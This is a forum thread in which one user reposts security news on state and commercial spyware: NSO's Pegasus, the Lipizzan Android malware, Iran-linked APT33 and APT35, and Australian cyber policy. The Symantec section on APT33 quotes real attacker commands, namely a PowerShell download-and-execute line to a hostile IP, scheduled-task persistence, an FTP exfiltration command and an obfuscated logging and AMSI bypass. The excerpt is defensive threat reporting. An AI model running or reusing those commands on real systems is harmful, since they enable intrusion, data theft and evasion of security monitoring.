The first global cyber war has begun

Moderators: Elvis, DrVolin, Jeff

Re: The first global cyber war has begun

Postby seemslikeadream » Mon Apr 01, 2019 9:04 pm

seemslikeadream » Thu Jul 27, 2017 8:41 am wrote:
Google May Have Just Uncovered An Israeli Surveillance Start-Up Spying On Androids
Thomas Fox-Brewster, FORBES STAFF
Jul 26, 2017 8:40 PM 2,398

Google thinks Android users are being targeted with malware [+]
Google has found another malware targeting Android that it believes may be the product of the bustling Israeli surveillance scene. Whereas it previously found Android devices infected with malware it claimed came from NSO Group, it’s now detailed a spy tool it says is linked to a start-up called Equus Technologies.

Google found the malware, which it dubbed Lipizzan, sitting on fewer than 100 phones after one of them was already infected with the Pegasus malware associated with the NSO Group. “Lipizzan was a sophisticated two stage spyware tool,” its Android security team wrote in a blog post today.

Of the 20 different forms in which the spyware was delivered, Google found a handful on its Play store. Typically, Lipizzan would appear as a legitimate tool, such as a backup or sound recorder app. It rooted, monitored and stole user email, SMS messages, location and voice calls. The tool also sought to gather data from specific apps, undermining their encryption, including WhatsApp, Viber and Telegram, while LinkedIn, Gmail and Skype were also on its target list.

Google has now thrown the app developers off Play, while the offending apps have been removed from infected devices.

Forbes attempted to contact Equus employees over LinkedIn and email, but had not received a response at the time of publication. It does not have a website or any publicly available contact details.

Google said there were references to the firm in the code itself. Megan Ruthven, from Google’s Android security team told Forbes during the Black Hat conference in Las Vegas that a config file within the app mentioned the Equus name. She said that was an indicator, but not guaranteed attribution.

Lookout Mobile Security researcher Andrew Blaich, who presented on the malware alongside Ruthven, said there was likely attribution to Equus. NSO Group also left references to its Pegasus spyware in its code, he noted, while saying that they hadn’t yet gone down the “rabbit hole” of Equus. Despite the indicators, neither Ruthven or Blaich could say with certainty Equus was the true owner of the malware.

Who are Equus?

And mystery surrounds Equus.

Currently, it’s unclear if Google’s suggestion that Equus is a cyber arms company is accurate. From the limited information available online, Equus appears to be based just down the road from NSO Group in the Herzliya district of Tel Aviv. According to LinkedIn, at least one engineer moved from NSO to Equus this year. And the description of the company on LinkedIn reads: “Equus Technologies is a privately held company specializing in the development of tailor made innovative active cyber solutions for law enforcement, intelligence agencies, and national security organizations.”

The co-founders are listed on the networking site as former Israel Defense Forces researcher Matan Markovics and Tel Aviv University graduate Daniel Hanga. Markovics also used to ply his trade at another notable Israeli arms company, Rafael.

The company has given talks at ISS World Training, previously referred to as the Wiretappers’ Ball, where all manor of surveillance companies flog their gear. In 2015, it spoke on ‘Addressing the Growing Challenges of Cyber Intelligence’ during an ISS event in Prague, Czech Republic.

According to previous reports, earlier this year the company’s head of research, Amihai Neiderman, found an astonishing 40 zero-day vulnerabilities in Samsung’s Tizen operating system. They could have been exploited on Samsung smart TVs as well as cellphones. Neiderman also registered the site tizenhacker.com. It’s yet to have hosted any content, however.

Regardless of who Equus are and what link they have to the Lipizzan software, John Scott-Railton, a surveillance software researcher with Citizen Lab at the University of Toronto, said Google was doing fine work in providing a window into the “secretive but growing industry developing private malware.”

“A commercial spyware firm was trying to run below Google’s radar and deliver spyware across their platform. With this post, Google has said very publicly, ‘no you don’t.’” Pointing to recent reports of a proposed $400 million acquisition of 40% of NSO by Blackstone, Scott-Railton added: “This case highlights the risks that companies making commercial spyware may pose as investment opportunities as they run up against major companies’ commitments to protect their users.”

He’s been tracking NSO Group’s spread across Mexico, where it was recently seen targeting independent investigators looking into the mass disappearance of students in 2014. NSO didn’t deny it had sold to Mexico, but did express concern about any illegal use of its Pegasus software.
https://www.forbes.com/sites/thomasbrew ... lware/amp/



chump » Wed Oct 03, 2018 1:43 pm wrote:

https://citizenlab.ca/2018/10/the-kingd ... dian-soil/

THE KINGDOM CAME TO CANADA

How Saudi-Linked Digital Espionage Reached Canadian Soil

By Bill Marczak, John Scott-Railton, Adam Senft, Bahr Abdul Razzak, and Ron Deibert October 1, 2018


In this report, we describe how Canadian permanent resident and Saudi dissident Omar Abdulaziz was targeted with a fake package delivery notification. We assess with high confidence that Abdulaziz’s phone was infected with NSO’s Pegasus spyware. We attribute this infection to a Pegasus operator linked to Saudi Arabia.

Key Findings

• We have high confidence that the cellphone of Omar Abdulaziz, a Saudi activist and Canadian permanent resident, was targeted and infected with NSO Group’s Pegasus spyware. Abdulaziz has been outspoken on an ongoing diplomatic feud over human rights issues between Canada and Saudi Arabia. The targeting occurred while Abdulaziz, who received asylum in Canada, was attending university in Quebec.

• During our recently published global mapping of NSO’s Pegasus infrastructure, we identified a suspected infection located in Quebec, Canada, operated by what we infer is a Saudi Arabia-linked Pegasus operator. We matched the infection’s pattern of life to the movements of Abdulaziz, and his phone, with his assistance. After examining his text messages, we identified a text message that masqueraded as a package tracking link. This message contained a link to a known Pegasus exploit domain.

• We are unaware of any legal authorization for the infection and monitoring of Omar Abdulaziz in Canada by a foreign government. If not properly authorized, the operators behind this targeting may have committed multiple Criminal Code offences, including willfully intercepting private communications contrary to section 184(1).

1. Summary

Israel-based “Cyber Warfare” vendor NSO Group produces and sells Pegasus mobile phone spyware suite. Pegasus customers can infect targets using Androids and iPhones by sending them specially crafted exploit links. Once a phone is infected, the customer has full access to a victim’s personal files, such as chats, emails, and photos. They can even surreptitiously use the phone’s microphones and cameras to view and eavesdrop on their targets.

Over the past two years, multiple reports have emerged showing how Pegasus was abused by multiple NSO Group customers to target civil society. In 2016, Citizen Lab published the first report on the use of Pegasus, Million Dollar Dissident, which detailed how award-winning human rights defender Ahmed Mansoor was targeted, likely by the government of the United Arab Emirates. In 2017, Citizen Lab reported abusive uses of Pegasus spyware in Mexico, where targets included lawyers, journalists, and politicians. In August 2018, Amnesty International reported that a Saudi dissident based abroad (later revealed to be Yahya Assiri), as well as an Amnesty researcher, were targeted with Pegasus. In addition, former president Ricardo Martinelli stands accused by the government of Panama of having used Pegasus during his tenure between 2009 and 2014 to systematically spy on political opponents and journalists.

In a September 2018 report titled Hide and Seek, we detailed our investigation into the global proliferation of Pegasus operators and infections. After scanning the Internet for Pegasus servers and grouping the 1,091 servers we found into 36 distinct operators, we used DNS cache probing to query Internet Service Providers (ISPs) around the world and identified 120 ISPs in 45 countries where we suspected Pegasus infections were located (Figure 1). Our technique was based on the assumption that Pegasus infections regularly “phone home” to their command and control (C&C) servers to exfiltrate information and receive new commands from their operator.


Image


Our Hide and Seek investigation revealed an intriguing suspected infection in Quebec, Canada. We observed the infection moving between a consumer ISP and a university ISP, during the evenings and outside of the academic year. We linked this infection to an operator that we call KINGDOM, which was also responsible for the 2018 targeting of Saudi dissident Yahya Assiri and an Amnesty International researcher. Suspecting that the Canadian target was a Saudi-linked individual in Quebec, we contacted local members of the Saudi diaspora and attempted to identify a person whose movements fit the infection’s pattern. We found one match: Omar Abdulaziz, a university student with a regular pattern of evening activity. On two specific days, we were able to match the timing of his evening activity, and then his return home, to the movement of the infection between the two ISPs. We also examined Abdulaziz’s phone and found a fake package tracking notification SMS containing a Pegasus exploit link. These factors lead us to conclude with high confidence that Abdulaziz’s iPhone was infected with NSO Group’s Pegasus spyware.


Abdulaziz is a Canadian permanent resident and vocal critic of the Saudi government. In 2014, he was forced to seek asylum in Canada in the face of strong pressure from the Saudi government. Today, Abdulaziz is a university student in Quebec, where he continues to be an outspoken voice on human rights issues in Saudi Arabia. In August 2018, Saudi authorities threatened his brother with jail time in what Abdulaziz believes was an attempt to pressure him into silence. When he continued speaking out, two of his brothers and several of his friends in Saudi Arabia disappeared. Pegasus would have allowed the operators to copy Abdulaziz’s contacts, private family photos, text messages, and live voice calls from popular mobile messaging apps. The operators could have even activated his phone’s camera and microphone to capture activity, such as conversations, taking place in his home.

We are unaware of any legal authorization for the hacking and monitoring of Omar Abdulaziz in Canada by a foreign government. These actions may be contrary to multiple Criminal Code provisions, including willfully intercepting private communications, an indictable offence under section 184.


2. Omar Abdulaziz Targeted with Pegasus

Omar Abdulaziz is a prominent Saudi political activist who has been based in Canada since 2009. As a student at McGill University, Abdulaziz started a popular satirical news show on YouTube (Figure 3), which is highly critical of the Saudi government’s repressive tactics and human rights record. The show has garnered millions of views, and he has developed a large social media following. After the Saudi government withdrew his scholarship to study in Canada, Abdulaziz applied for asylum and was granted permanent resident status in Canada in 2014.


Abdulaziz continues to be outspoken about the Saudi government’s human rights record and has been particularly vocal and active during an ongoing diplomatic dispute between Canada and Saudi Arabia (See section 5), helping fellow Saudi students impacted by the dispute to claim asylum in Canada. Abdulaziz regularly appears in Canadian media, including a recent guest appearance on the Canadian Broadcasting Corporation (CBC)’s current affairs show, The Current, on August 10, 2018, where he said that Saudi authorities had entered his brother’s home in Saudi Arabia and “asked him to convince me [to] stop tweeting about what’s really going on between Canada and Saudi Arabia, or they’re going to send him to jail.” The Saudi government appears to have made good on the threat: later in August, Abdulaziz’s two brothers and a number of friends were arrested in Saudi Arabia. He believes that the arrests were an attempt to discourage him from speaking out further.

On a summer morning in 2018, Abdulaziz made a purchase on the online shopping website Amazon. Later that day he received a text message (Figure 4) purporting be a package shipment notification from the logistics company DHL. The URL in the message was from the domain sunday-deals[.]com. This domain belongs to a cluster that we previously identified as Pegasus exploit domains. Based on our prior research, we have high confidence that clicking on the link would result in the infection of the device with NSO’s Pegasus spyware. Abdulaziz, who says he uses a separate phone for his activism, told us that the message arrived on his personal phone. Abdulaziz recalled thinking that the message was related to his online shopping.

We first contacted and obtained the SMS (Figure 4) from Abdulaziz following an extensive global study of suspected Pegasus infections (Section 3), which identified an interesting Saudi-linked infection in Quebec.

3. DNS Cache Probing Leads us to Abdulaziz

On September 18, 2018, we published a report titled Hide and Seek, which describes how we scanned the Internet to generate a list of Pegasus spyware servers, used a technique that we call Athena to group the servers into 36 distinct Pegasus systems, and performed DNS cache probing of ISPs to identify locations from where suspected Pegasus infections were phoning home. In total, we identified 120 ISPs in 45 countries with likely infections (Figure 1) and 10 Pegasus systems whose operators were engaging in suspected cross-border monitoring (i.e., monitoring infected devices in more than one country).

[… con’d]


Spyware vendor defends hacking journalists, continues to embolden abusive governments

Camille Fassett
Reporter
March 26, 2019
CitizenLab
The Citizen Lab
Image
The founder of of spyware vendor NSO Group appeared to defend targeting journalists, activists, and human rights defenders with its malicious software Pegasus in an interview days ago with CBS.

NSO Group has been back in the headlines again when it was uncovered that the wife of a murdered Mexican journalist was targeted with the company’s spyware after her husband’s assassination. What’s more, a Saudi dissident alleged in a December 2018 lawsuit that Pegasus was used in an attempt to spy on journalist Jamal Khashoggi before he was murdered by the Saudi Arabia government, a claim which CBS’s 60 Minutes explored on Sunday.

What is clear is that Pegasus, supposedly intended for government use only against “terrorists,” has been used against people who may pose headaches for their governments. NSO Group has failed to cut off relationships with authoritarian governments found to have targeted their critics, and it’s seems from CBS’s interview that NSO’s leadership has no intention to do so.

Used against journalists by their own governments
In 2016, Mexican journalist Sebastián Barragán received a text message that read: “I have credible evidence against public servants”. Beneath it was a link that researchers would later determine contained malware to remotely take over the device.

Citizen Lab, a technical lab and digital rights organization based in Toronto, has been researching Pegasus — malware used to hack people’s phones — for years. It has found that Barragán is one of an unknown number of media workers targeted with malware by their own government. Others include investigative journalist Carmen Aristegui and her son, Mexican journalist Rafael Cabrera, and Televisa anchor Carlos Loret de Mola. And due to the secret nature of spyware, it’s possible there are numerous other members of the Mexican press yet to be identified who have been targeted.

Compromising a journalist’s mobile device could threaten their sensitive reporting processes, privacy, and families. It can put sources and whistleblowers in serious danger.

What is Pegasus and how does it work?
Journalists — especially those covering sensitive subjects like corruption or national security — frequently receive messages, email attachments, and documents that promise to contain tips and useful reporting materials. Pegasus works by exploiting journalists who are doing their jobs following through on potential news or messages that appear to come from whistleblowers. Once a user clicks on a malware infected attachment, Pegasus can take over a device, essentially letting an attacker see everything that is happening on a phone.

Freedom of the Press Foundation Director of Newsroom Security Harlo Holmes said that a device becoming infected usually starts with a link received over SMS, or even through an end-to-end encrypted messaging service like WhatsApp.

“The language is crafted to lure a journalist specifically, by mentioning personal details or by sending them at times that are contextually appropriate, like in response to a real life incident. These tactics maximize the chance that the journalist will actually click through.”

“Modern software is incredibly complex, and sometimes bugs go undiscovered by their developers,” said David Huerta, a digital security trainer at Freedom of the Press Foundation. “Some bugs can break a device’s security safeguards. Companies like NSO Group find these security-breaking bugs and turn them into weapons.”

(For a more technical explanation of Pegasus’ pathology, see Citizen Lab’s reports.)

What can journalists do to protect themselves from spyware?
Malware like Pegasus can run in the background, and it’s possible journalists could remain unaware that their devices have been compromised and are being remotely controlled once they’ve clicked on an inflected attachment. Holmes emphasized that this is by design. “It’s made to be as stealthy as possible, and there are other factors that are dependent on the individual device that could make it very difficult for someone without a forensic background to know definitively.”

Journalists can minimize their risk of infection by malware through basic digital security hygiene, and, in particular, installing software updates.

“Pegasus works by taking advantage of security holes in your mobile device,” said Digital Security Trainer Olivia Martin. “The only way to patch these vulnerabilities is by applying system updates, which often contain security fixes.”

If journalists or activists suspect their devices have already been compromised, numerous digital rights and press freedom groups may be able to help or facilitate a connection to someone who can, including Freedom of the Press Foundation, Electronic Frontier Foundation, Committee to Protect Journalists, CitizenLab, and Reporters without Borders.

While no digital security practices are infallible, there are numerous resources are available for journalists to proactively protect their devices and sensitive reporting materials to minimize risks of malware infection before it happens. Check out Freedom of the Press Foundation’s digital security guides, and the Electronic Frontier Foundation’s surveillance self-defense kit.

“That’s a decision intelligence agencies should get…”
In an interview with CBS’ 60 Minutes on Mar. 24, NSO Group CEO Shalev Hulio and co-president Tami Shachar were presented with an opportunity to categorically denounce the unconscionable use of Pegasus against targets such as journalists.

Shachar disputed whether many of these abuses had ever occurred at all. “Nothing has been proven,” Shachar told CBS when asked about them, despite Citizen Lab’s public research showing that Pegasus has been used against journalists and human rights defenders.

When confronted with the reports that NSO Group sold Pegasus to Saudi Arabia in connection with the murder of Jamal Khashoggi, Hulio refused to “talk about specific customer." When asked to clarify whether he would not sell Pegasus to a country known for human rights and press freedom abuses, he only reiterated that Pegasus is sold to “prevent crime and terror.”

But governments like Saudi Arabia are quick label dissidents and free speech advocates as terrorists, too. While he claimed there were “a hundred” governments they wouldn’t sell to, apparently Saudi Arabia—one of the most repressive regimes in the world—wasn’t on that alleged “do not sell” list.

“They consider anybody who is a threat to their regime is a terrorist,” Saudi comic Ghanem Almasarir, who was also allegedly targeted by the Saudi government using Pegasus told CBS.

And perhaps most disturbingly, Hulio appeared to justify government targeting of journalists in the process of stopping “terrorism.” “...[I]f [journalists] are in touch with a drug lord… and in order to catch them, you need to intercept them, that’s a decision intelligence agencies should get.”

NSO Group’s answers show that the company has no intention of taking responsibility for its technology, breaking off its relationships with abusive governments, or categorically preventing the use of Pegasus spyware against journalists and activists. Companies like NSO Group continue to empower authoritarian governments to hack their critics, and in doing so, put countless journalists at severe risk.
https://freedom.press/news/spyware-vend ... vernments/
Mazars and Deutsche Bank could have ended this nightmare before it started.
They could still get him out of office.
But instead, they want mass death.
Don’t forget that.
User avatar
seemslikeadream
 
Posts: 32090
Joined: Wed Apr 27, 2005 11:28 pm
Location: into the black
Blog: View Blog (83)

Re: The first global cyber war has begun

Postby seemslikeadream » Tue Apr 02, 2019 6:20 am

Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.
Although heavily focused on the Middle East, Elfin (aka APT33) has also targeted a range of organizations in the U.S. including a number of major corporations.

27 Mar, 2019
The Elfin espionage group (aka APT33) has remained highly active over the past three years, attacking at least 50 organizations in Saudi Arabia, the United States, and a range of other countries.

The group, which first became active in late 2015 or early 2016, specializes in scanning for vulnerable websites and using this to identify potential targets, either for attacks or creation of command and control (C&C) infrastructure. It has compromised a wide range of targets, including governments along with organizations in the research, chemical, engineering, manufacturing, consulting, finance, telecoms, and several other sectors.

Vulnerability exploitation

In a recent wave of attacks during February 2019, Elfin attempted to exploit a known vulnerability (CVE-2018-20250) in WinRAR, the widely used file archiving and compression utility capable of creating self-extracting archive files. The exploit was used against one target in the chemical sector in Saudi Arabia. If successfully exploited on an unpatched computer, the vulnerability could permit an attacker to install any file on the computer, which effectively permits code execution on the targeted computer.

Two users in the targeted organization received a file called "JobDetails.rar", which attempted to exploit the WinRAR vulnerability. This file was likely delivered via a spear-phishing email. However, prior to this attempted attack, Symantec had rolled out proactive protection against any attempt to exploit this vulnerability (Exp.CVE-2018-20250). This protection successfully protected the targeted organization from being compromised.

The Shamoon connection

Elfin came under the spotlight in December 2018 when it was linked with a new wave of Shamoon attacks. One Shamoon victim in Saudi Arabia had recently also been attacked by Elfin and had been infected with the Stonedrill malware (Trojan.Stonedrill) used by Elfin. Because the Elfin and the Shamoon attacks against this organization occurred so close together, there has been speculation that the two groups may be linked. However, Symantec has found no further evidence to suggest Elfin was responsible for these Shamoon attacks to date. We continue to monitor the activities of both groups closely.

Elfin’s toolset

Elfin has deployed a wide range of tools in its attacks including custom malware, commodity malware, and open-source hacking tools.

Custom malware used by the group include:

Notestuk (Backdoor.Notestuk) (aka TURNEDUP): Malware that can be used to open a backdoor and gather information from a compromised computer.
Stonedrill (Trojan.Stonedrill): Custom malware capable of opening a backdoor on an infected computer and downloading additional files. The malware also features a destructive component, which can wipe the master boot record of an infected computer.
AutoIt backdoor: A custom built backdoor written in the AutoIt scripting language.
In addition to its custom malware, Elfin has also used a number of commodity malware tools, available for purchase on the cyber underground. These include:

Remcos (Backdoor.Remvio): A commodity remote administration tool (RAT) that can be used to steal information from an infected computer.
DarkComet (Backdoor.Breut): Another commodity RAT used to open a backdoor on an infected computer and steal information.
Quasar RAT (Trojan.Quasar): Commodity RAT that can be used to steal passwords and execute commands on an infected computer.
Pupy RAT (Backdoor.Patpoopy): Commodity RAT that can open a backdoor on an infected computer.
NanoCore (Trojan.Nancrat): Commodity RAT used to open a backdoor on an infected computer and steal information.
NetWeird (Trojan.Netweird.B): A commodity Trojan which can open a backdoor and steal information from the compromised computer. It may also download additional potentially malicious files.
Elfin also makes frequent use of a number of publicly available hacking tools, including:

LaZagne (SecurityRisk.LaZagne): A login/password retrieval tool
Mimikatz (Hacktool.Mimikatz): Tool designed to steal credentials
Gpppassword: Tool used to obtain and decrypt Group Policy Preferences (GPP) passwords
SniffPass (SniffPass): Tool designed to steal passwords by sniffing network traffic
Case study: How an Elfin attack unfolds

In this section, we describe in detail an Elfin attack on a U.S. organization. On February 12, 2018 at 16:45 (all times are in the organization’s local time), an email was sent to the organization advertising a job vacancy at an American global service provider. The email contained a malicious link to hxxp://mynetwork.ddns[DOT].net:880.

The recipient clicked the link and proceeded to download and open a malicious HTML executable file, which in turn loaded content from a C&C server via an embedded iframe. At the same time, code embedded within this file also executed a PowerShell command to download and execute a copy of chfeeds.vbe from the C&C server.

[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};IEX(New-Object Net.WebClient).DownloadString('hxxps://217.147.168[DOT]46:8088/index.jpg');
A second JavaScript command was also executed, which created a scheduled task to execute chfeeds.vbe multiple times a day.

a.run('%windir%\\System32\\cmd.exe /c PowerShell -window hidden schtasks.exe /CREATE /SC DAILY /TN "1" /TR "C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Feeds\\chfeeds.vbe" /ST 01:00 /f && schtasks.exe /CREATE /SC DAILY /TN "3" /TR "C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Feeds\\chfeeds.vbe" /ST 03:00 /f && schtasks.exe /CREATE /SC DAILY /TN "5" /TR "C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Feeds\\chfeeds.vbe" /ST 05:00 /f && schtasks.exe /CREATE /SC DAILY /TN "7" /TR "C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Feeds\\chfeeds.vbe" /ST 07:00 /f && schtasks.exe /CREATE /SC DAILY /TN "9" /TR "C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Feeds\\chfeeds.vbe" /ST 09:00 /f && schtasks.exe /CREATE /SC DAILY /TN "11" /TR "C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Feeds\\chfeeds.vbe" /ST 11:00 /f && schtasks.exe /CREATE /SC DAILY /TN "13" /TR "C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Feeds\\chfeeds.vbe" /ST 13:00 /f && schtasks.exe /CREATE /SC DAILY /TN "15" /TR "C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Feeds\\chfeeds.vbe" /ST 15:00 /f && schtasks.exe /CREATE /SC DAILY /TN "17" /TR "C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Feeds\\chfeeds.vbe" /ST 17:00 /f && schtasks.exe /CREATE /SC DAILY /TN "19" /TR "C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Feeds\\chfeeds.vbe" /ST 19:00 /f && schtasks.exe /CREATE /SC DAILY /TN "21" /TR "C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Feeds\\chfeeds.vbe" /ST 21:00 /f && schtasks.exe /CREATE /SC DAILY /TN "23" /TR "C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Feeds\\chfeeds.vbe" /ST 23:00 /f ')
The chfeeds.vbe file acts as a downloader and was used to download a second PowerShell script (registry.ps1). This script in turn downloaded and executed a PowerShell backdoor known as POSHC2, a proxy-aware C&C framework, from the C&C server (hxxps:// host-manager.hopto.org). Later at 20:57, the attackers became active on the compromised machine and proceeded to download the archiving tool WinRAR.

89.34.237.118 808 hxxp://89.34.237[DOT]118:808/Rar32.exe
At 23:29, the attackers then proceeded to deploy an updated version of their POSHC2 stager.

192.119.15.35 880 hxxp://mynetwork.ddns[DOT]net:880/st-36-p4578.ps1
This tool was downloaded several times between 23:29 on February 12 and 07:47 on February 13.

Two days later, on February 14 at 15:12, the attackers returned and installed Quasar RAT onto the infected computer that communicated with a C&C server (217.147.168.123). Quasar RAT was installed to CSIDL_PROFILE\appdata\roaming\microsoft\crypto\smss.exe.

At this point, the attackers ceased activity while maintaining access to the network until February 21. At 06:38, the attackers were observed downloading a custom .NET FTP tool to the infected computer.

192.119.15.36 880 hxxp://192.119.15[DOT]36:880/ftp.exe
Later at 6:56, the attackers exfiltrated data using this FTP tool to a remote host:

JsuObf.exe Nup#Tntcommand -s CSIDL_PROFILE\appdata\roaming\adobe\rar -a ftp://89.34.237.118:2020 -f /[REDACTED] -u [REDACTED] -p [REDACTED]
Activity ceased until the attackers returned on March 5 and were observed using Quasar RAT to download a second custom AutoIt FTP exfiltration tool known as FastUploader from hxxp://192.119.15[DOT]36:880/ftp.exe. This tool was then installed to csidl_profile\appdata\roaming\adobe\ftp.exe. FastUploader is a custom FTP tool designed to exfiltrate data at a faster rate than traditional FTP clients.

At this point, additional activity from the attackers continued between March 5 into April, and on April 18 at 11:50, a second remote access tool known as DarkComet was deployed to csidl_profile\appdata\roaming\microsoft\windows\start menu\programs\startup\smss.exe on the infected computer. This was quickly followed 15 seconds later by the installation of a credential dumping to csidl_profile\appdata\roaming\microsoft\credentials\dwm32.exe, and the execution of PowerShell commands via PowerShell Empire, a freely available post-exploitation framework, to bypass logging on the infected machine.

$GPF=[Ref].AsSeMBLy.GeTTYPe('System.Management.Automation.Utils')."GEtFiE`LD"('cachedGroupPolicySettings','N'+'onPublic,Static');If($GPF){$GPC=$GPF.GeTVALUE($NUlL);If($GPC['ScriptB'+'lockLogging']){$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$vAL=[COlLecTIons.GEneRic.DIctIoNARy[stRiNG,SyStEM.Object]]::nEw();$VAL.ADD('EnableScriptB'+'lockLogging',0);$VaL.Add
('EnableScriptBlockInvocationLogging',0);$GPC
['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$VaL}ELSe{[SCRIPTBLOck]."GEtFiE`Ld"('signatures','N'+'onPublic,Static').SETVAlue($NuLL,(New-ObjeCt ColLectiONs.GeNERic.HASHSEt[StrInG]))}[REF].AssemBLy.GetTyPE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GEtFielD('amsiInitFailed','NonPublic,Static').SETValUe($nUll,$TrUE)};
Activity continued throughout April where additional versions of DarkComet, POSHC2 implants, and an AutoIt backdoor were deployed along with further credential dumping activities.

Active and agile attacker

Elfin is one of the most active groups currently operating in the Middle East, targeting a large number of organizations across a diverse range of sectors. Over the past three years, the group has utilized a wide array of tools against its victims, ranging from custom built malware to off-the-shelf RATs, indicating a willingness to continually revise its tactics and find whatever tools it takes to compromise its next set of victims.

Protection/Mitigation

Symantec has the following protection in place to protect customers against these attacks:

File-based protection

Backdoor.Notestuk
Trojan.Stonedrill
Backdoor.Remvio
Backdoor.Breut
Trojan.Quasar
Backdoor.Patpoopy
Trojan.Nancrat
Trojan.Netweird.B
Exp.CVE-2018-20250
SecurityRisk.LaZagne
Hacktool.Mimikatz
SniffPass
https://www.symantec.com/blogs/threat-i ... -espionage
Mazars and Deutsche Bank could have ended this nightmare before it started.
They could still get him out of office.
But instead, they want mass death.
Don’t forget that.
User avatar
seemslikeadream
 
Posts: 32090
Joined: Wed Apr 27, 2005 11:28 pm
Location: into the black
Blog: View Blog (83)

Re: The first global cyber war has begun

Postby Elvis » Tue Apr 02, 2019 6:18 pm

On the OP's request, I've merged the "Dutch took pictures of Russian hackers of US Democrats" thread into this one.

Remember, no fighting in the Cyber War thread! :wink
“The purpose of studying economics is not to acquire a set of ready-made answers to economic questions, but to learn how to avoid being deceived by economists.” ― Joan Robinson
User avatar
Elvis
 
Posts: 7441
Joined: Fri Apr 11, 2008 7:24 pm
Blog: View Blog (0)

Re: The first global cyber war has begun

Postby seemslikeadream » Wed Apr 03, 2019 5:15 am

thanks

Microsoft Retaliates Against APT35 Hacker Group by Seizing 99 Domains
Sergiu Gatlan
Microsoft Retaliates Against APT35 Hacker Group by Seizing 99 Domains

Court documents unsealed today show how Microsoft’s Digital Crimes Unit was able to block some of the cyber attacks conducted by an Iranian-backed advanced persistence threat (APT) group by taking over domains used as part of their core operations.

The cyber attacks conducted by hacking group APT35 (aka Charming Kitten, Phosphorus, or Ajax Security Team) were disrupted by Microsoft after the company sued them in the U.S. District Court for Washington D.C. and managed to take over 99 domains the hackers used in their malicious campaigns.

The company's Microsoft’s Digital Crimes Unit (DCU) and Microsoft Threat Intelligence Center (MSTIC) tracked the hacking group since 2013, keeping a close watch on its spear-phishing campaigns that targeted businesses, government agencies, activists and journalists from the U.S. and from other countries.

New York Albany Capital Hit by Ransomware Attack
By seizing the 99 domains previously controlled by APT35, Microsoft was able to take over parts of the hacking group's core operations and "redirect traffic from infected devices" the Digital Crime Unit’s sinkhole, thus collecting important info on the group's operations.

Posphorus phising control panel
Charming Kitten spear phishing campaign control panel
The full list of Charming Kitten domains seized by Microsoft is available in Appendix A of the complaint filed by Redmond against the hackers, listing the defendants in the form of a "John Doe defendant" since their identities are still unknown.

During the tracking operation, Microsoft says that it also "worked closely with a number of other technology companies, including Yahoo, to share threat information and jointly stop attacks."

Microsoft's Tom Burt, Corporate Vice President, Customer Security & Trust, said that:

While we’ve used daily security analytics tracking to stop individual Phosphorus attacks and notify impacted customers, the action we executed last week enabled us to take control of websites that are core to its operations. Our work to track Phosphorus over multiple years and observe its activity enabled us to build a decisive legal case and execute last week’s action with confidence we could have a significant impact on the group’s infrastructure.

Restraining orders also used to seize Fancy Bear domains

Also, Redmond was helped by the domain registrars which made the process of transferring the domains to Microsoft very easy once the restraining order which allowed them to take over the 99 domains was granted on March 15.

This type of action against threat groups is not something unique seeing that Microsoft has filed 15 similar cases against the Russian-backed APT group Strontium (aka Fancy Bear or APT28) back in August 2018, which led to the seizing of 91 domains controlled by the Russian hacking group.

All the complaints, summons, court orders, and other legal documents related to the Microsoft case against APT35 are available HERE.
https://www.bleepingcomputer.com/news/s ... 9-domains/
Mazars and Deutsche Bank could have ended this nightmare before it started.
They could still get him out of office.
But instead, they want mass death.
Don’t forget that.
User avatar
seemslikeadream
 
Posts: 32090
Joined: Wed Apr 27, 2005 11:28 pm
Location: into the black
Blog: View Blog (83)

Re: The first global cyber war has begun

Postby seemslikeadream » Tue Oct 29, 2019 9:49 am

Cyber Security Strategy 2020: Civil society experts slam 'national security' agenda
The goal of an 'open and free internet' has been dropped from Australia's proposed national cybersecurity strategy. Job done, apparently.

By Stilgherrian for The Full Tilt | October 29, 2019 -- 03:23 GMT (20:23 PDT) | Topic: Security

Image: Asha Barbaschow/ZDNet
The Australian government needs to drop the "national security" framing of its cybersecurity strategy, according to speakers at the inaugural NetThing, held at the University of Technology Sydney (UTS) on Tuesday.

Australia is currently reviewing its national strategy. The Department of Home Affairs published a discussion paper last month, Australia's 2020 Cyber Security Strategy: A call for views [PDF].

Speakers were concerned that the framing of cybersecurity had shifted from that of the original 2016 strategy issued by then-Prime Minister Malcolm Turnbull.

"There's two sort of narratives in cybersecurity and ... states align with one or the other," said Lucie Krahulcova, Asia policy analyst at Access Now.

One is the narrative of national security; a narrative of control, like in China and Russia, as well as in many other governments.

The other is the narrative of the internet as a shared common good and an enabler of civic rights. Under that framing, cybersecurity is about the integrity of the system and the protection of individual users.

"I think Australia teeters on the edge of those," Krahulcova said.

"I would go as far as to say that certain parts of the government aren't quite as aware [of] how much Australia sits with the Chinas and Russias," she said.

"In spite of the cybersecurity objectives which were there since 2016, since 2017, the whole narrative and the way that the government views this space has been about control."

The Australian government doesn't like being compared with China or Russia. Apart from dumping two speakers from CyberCon earlier this month, it also pressured a third speaker to edit his "biased" slide deck.

Lawyer Ted Ringrose, the pressured speaker, had compared Australia's encryption laws with China's, saying that while Australia's looked worse on the surface, they were "just about as bad".

The 2016 strategy said its aim was an "open, free and secure internet", but that wording has been dropped from the 2020 draft.

One action item from 2016 was "Champion an open, free, and secure internet to enable all countries to generate growth and opportunity online". The 2020 discussion paper says this task is "Complete".

